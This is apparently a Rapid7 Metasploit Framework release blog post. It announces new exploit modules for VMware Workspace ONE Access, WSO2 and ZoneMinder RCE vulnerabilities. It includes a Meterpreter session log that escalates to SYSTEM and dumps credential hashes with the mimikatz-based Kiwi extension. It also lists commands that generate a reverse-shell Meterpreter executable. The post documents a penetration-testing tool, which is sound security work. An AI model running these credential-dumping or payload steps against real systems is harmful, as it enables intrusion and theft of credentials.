Metasploit Wrap-Up

VMware Workspace ONE Access RCE

Community contributor wvu has developed a new Metasploit Module which exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the ‘horizon’ user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official Rapid7 Analysis

WSO2 Arbitrary File Upload to RCE

Our very own Jack Hysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official Rapid7 Analysis

Kiwi Meterpreter Updates - Windows 11 Support

The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably this adds support for Windows 11 when running the creds_all command within a Meterpreter console:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi…
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > sysinfo
Computer        : WIN11-TEST
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : TESTINGDOMAIN
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain         NTLM                           SHA1
--------     ------         ----                           ----
WIN11-TEST$  TESTINGDOMAIN  a133becebb8e22321dbf26bf8d90f398  dbf0ad587f62004306f435903fb3a516da6ba104
... etc etc ...

New module content (3)

• VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954 - This adds an exploit for CVE-2022-22954 which is an unauthenticated RCE in VMWare Workspace ONE Access.
• WSO2 Arbitrary File Upload to RCE by wvu, Jack Heysel, Orange Tsai, and hakivvi, which exploits CVE-2022-29464 - This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.
• ZoneMinder Language Settings Remote Code Execution by krastanoel, which exploits CVE-2022-29806 - This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the www-data user.

Enhancements and features (2)

• #16445 from dwelch-r7 - The Windows Meterpreter payload now supports a MeterpreterDebugLogging datastore option for logging debug information to a file. Example usage:

  use windows/x64/meterpreter_reverse_tcp
  set MeterpreterDebugBuild true
  set MeterpreterDebugLogging rpath:C:/test/foo.txt
  save
  generate -f exe -o shell.exe
  to_handler

• #16462 from bcoles - Adds support for armle/aarch64 architectures to gdb_server_exec

Bugs fixed (2)

• #16526 from jheysel-r7 - The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.
• #16530 from sjanusz-r7 - This updates the pihole_remove_commands_lpe module to no longer break sessions when running the check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.40…6.1.41
• Full diff 6.1.40…6.1.41

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).